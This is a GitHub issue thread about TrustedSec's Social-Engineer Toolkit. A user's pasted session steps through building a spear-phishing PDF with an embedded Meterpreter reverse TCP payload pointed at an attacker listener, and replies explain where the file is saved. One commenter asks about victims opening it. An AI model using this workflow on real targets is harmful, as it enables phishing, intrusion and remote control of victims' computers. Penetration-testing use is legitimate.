trustedsec / social-engineer-toolkit

The Social-Engineer Toolkit (SET) repository from TrustedSec - All new versions of SET will be deployed here.

All payloads get sent to the template.pdf directory. Where are my payloads? #223

Closed DuStyGSY closed 8 years ago

DuStyGSY commented 8 years ago

I have just downloaded and installed SET, as the one that comes with Kali keeps talking about bleeding edge repositories. As you can see, I am using Version 7.0.6 and this problem still persists.

Here is my output:

[---] The Social-Engineer Toolkit (SET) [---]
[---] Created by: David Kennedy (ReL1K) [---]
[---] Version: 7.0.6 [---]
[---] Codename: 'RemembRance' [---]
[---] Follow us on Twitter: @TrustedSec [---]
[---] Follow me on Twitter: @HackingDave [---]
[---] Homepage: https://www.trustedsec.com [---]

    Welcome to the Social-Engineer Toolkit (SET).
     The one stop shop for all of your SE needs.

 Join us on irc.freenode.net in channel #setoolkit

The Social-Engineer Toolkit is a product of TrustedSec.

         Visit: https://www.trustedsec.com

Select from the menu:

1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) Wireless Access Point Attack Vector
8) QRCode Generator Attack Vector
9) Powershell Attack Vectors
10) Third Party Modules

99) Return back to the main menu.

set> 1

The Spearphishing module allows you to specially craft email messages and send them to a large (or small) number of people with attached fileformat malicious payloads. If you want to spoof your email address, be sure "Sendmail" is installed (apt-get install sendmail) and change the config/set_config SENDMAIL=OFF flag to SENDMAIL=ON.

There are two options, one is getting your feet wet and letting SET do everything for you (option 1), the second is to create your own FileFormat payload and use it in your own attack. Either way, good luck and enjoy!

1) Perform a Mass Email Attack
2) Create a FileFormat Payload
3) Create a Social-Engineering Template

99) Return to Main Menu

set:phishing>2

Select the file format exploit you want. The default is the PDF embedded EXE.

       ********** PAYLOADS **********

1) SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)
2) SET Custom Written Document UNC LM SMB Capture Attack
3) MS15-100 Microsoft Windows Media Center MCL Vulnerability
4) MS14-017 Microsoft Word RTF Object Confusion (2014-04-01)
5) Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow
6) Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)
7) Adobe Flash Player "Button" Remote Code Execution
8) Adobe CoolType SING Table "uniqueName" Overflow
9) Adobe Flash Player "newfunction" Invalid Pointer Use
10) Adobe Collab.collectEmailInfo Buffer Overflow
11) Adobe Collab.getIcon Buffer Overflow
12) Adobe JBIG2Decode Memory Corruption Exploit
13) Adobe PDF Embedded EXE Social Engineering
14) Adobe util.printf() Buffer Overflow
15) Custom EXE to VBA (sent via RAR) (RAR required)
16) Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
17) Adobe PDF Embedded EXE Social Engineering (NOJS)
18) Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow
19) Apple QuickTime PICT PnSize Buffer Overflow
20) Nuance PDF Reader v6.0 Launch Stack Buffer Overflow
21) Adobe Reader u3D Memory Corruption Vulnerability
22) MSCOMCTL ActiveX Buffer Overflow (ms12-027)

set:payloads>13

[-] Default payload creation selected. SET will generate a normal PDF with embedded EXE.

1. Use your own PDF for attack
2. Use built-in BLANK PDF for attack

set:payloads>2

1) Windows Reverse TCP Shell              Spawn a command shell on victim and send back to attacker
2) Windows Meterpreter Reverse_TCP        Spawn a meterpreter shell on victim and send back to attacker
3) Windows Reverse VNC DLL                Spawn a VNC server on victim and send back to attacker
4) Windows Reverse TCP Shell (x64)        Windows X64 Command Shell, Reverse TCP Inline
5) Windows Meterpreter Reverse_TCP (X64)  Connect back to the attacker (Windows x64), Meterpreter
6) Windows Shell Bind_TCP (X64)           Execute payload and create an accepting port on remote system
7) Windows Meterpreter Reverse HTTPS      Tunnel communication over HTTP using SSL and use Meterpreter

set:payloads>2
set> IP address for the payload listener (LHOST): 192.168.21.105
set:payloads> Port to connect back on [443]:443
[-] Generating fileformat exploit...
[] Waiting for payload generation to complete...
[] Waiting for payload generation to complete...
[] Waiting for payload generation to complete...
[] Waiting for payload generation to complete...
[] Waiting for payload generation to complete...
[] Waiting for payload generation to complete...
[] Waiting for payload generation to complete...
[] Waiting for payload generation to complete...
[] Waiting for payload generation to complete...
[] Waiting for payload generation to complete...
[] Payload creation complete.
[] All payloads get sent to the template.pdf directory
[-] As an added bonus, use the file-format creator in SET to create your attachment.

Right now the attachment will be imported with filename of 'template.whatever'

Do you want to rename the file?

example Enter the new filename: moo.pdf

1. Keep the filename, I don't care.
2. Rename the file, I want to be cool.

set:phishing>test.pdf

Social Engineer Toolkit Mass E-Mailer

There are two options on the mass e-mailer, the first would be to send an email to one individual person. The second option will allow you to import a list and send it to as many people as you want within that list.

What do you want to do:

  1. E-Mail Attack Single Email Address
  2. E-Mail Attack Mass Mailer
  3. Return to main menu.

set:phishing>99

Thank you for shopping with the Social-Engineer Toolkit.

Hack the Gibson...and remember...hugs are worth more than handshakes.

trustedsec commented 8 years ago

Under the option to keep the filename or rename the file name why did you specify set:phishing>test.pdf instead of the option 1 or 2?

trustedsec commented 8 years ago

The file is stored under /root/.set/.

root@stronghold:~# ls -al /root/.set/
total 80
drwxr-xr-x  2 root root  4096 Apr 20 11:27 .
drwx------ 38 root root  4096 Apr  4 22:39 ..
-rw-r--r--  1 root root    47 Apr 20 11:27 payload.options
-rw-r--r--  1 root root    70 Apr 20 11:24 set.options
-rw-r--r--  1 root root 60539 Apr 20 11:27 template.pdf
-rw-r--r--  1 root root   228 Apr 20 11:27 template.rc

DuStyGSY commented 8 years ago

Hi thanks for the reply.

I just realised what I did there and ran back through the options. That's why I couldn't see my PDF file: I hadn't selected 2.

Cheers for your reply all sorted now.

firozmahamud29 commented 6 years ago

If I close the terminal and want to use the file again, or a victim opens the file after a few days, how can I check that?

cahsun147 commented 2 years ago

set:payloads> Port to connect back on [443]: 1337
[!] Metasploit has not been previously run on the system. This means that the msf directories haven't been created yet. Running Metasploit for you.
[*] Waiting 10 seconds for the directories to be created...
[!] Please exit out of SET and type 'msfconsole' from the command prompt and launch SET again. Can't find the msf4 directory.

How to fix

ghost commented 1 year ago

Hi, how do I get the .pdf out of there? I can't lol

mansoorbarri commented 1 year ago

Hi, how do I get the .pdf out of there? I can't lol

su -

then locate to the /root/.set/

cd /root/.set/

then copy it to somewhere in your user folder; in this case I'm going with the Downloads folder and my username is "anar"

mv <filename>.pdf /home/anar/Downloads

where <filename> is your PDF file name from setoolkit

ghost commented 1 year ago

Thanks!

business247 commented 1 year ago

yep thx very much for the quick tuto!

bypasssss commented 1 year ago

Thanks!

Hey, do you want to work in collaboration with me?

Dlion4636 commented 1 year ago

Yes of course

On Sat, Feb 4, 2023, 8:15 AM bypasssss @.***> wrote:

Thanks!

Hey, do you want to work in collaboration with me?


mserra0 commented 1 year ago

Hello, I have a problem: I don't know where my PDF payloads are. I'm trying to find the template.whatever file.

kurogai commented 1 year ago

Does this work with Android?

mansoorbarri commented 1 year ago

Hello, I have a problem: I don't know where my PDF payloads are. I'm trying to find the template.whatever file.

https://github.com/trustedsec/social-engineer-toolkit/issues/223#issuecomment-1364383440

mansoorbarri commented 1 year ago

Does this work with Android?

I hope so, although I haven't tried on Android.

bypasssss commented 1 year ago

Hey Barri

On Mon, Jun 19, 2023 at 14:41, Mansoor Barri @.***> wrote:

Does this work with Android?

I hope so, although I haven't tried on Android.
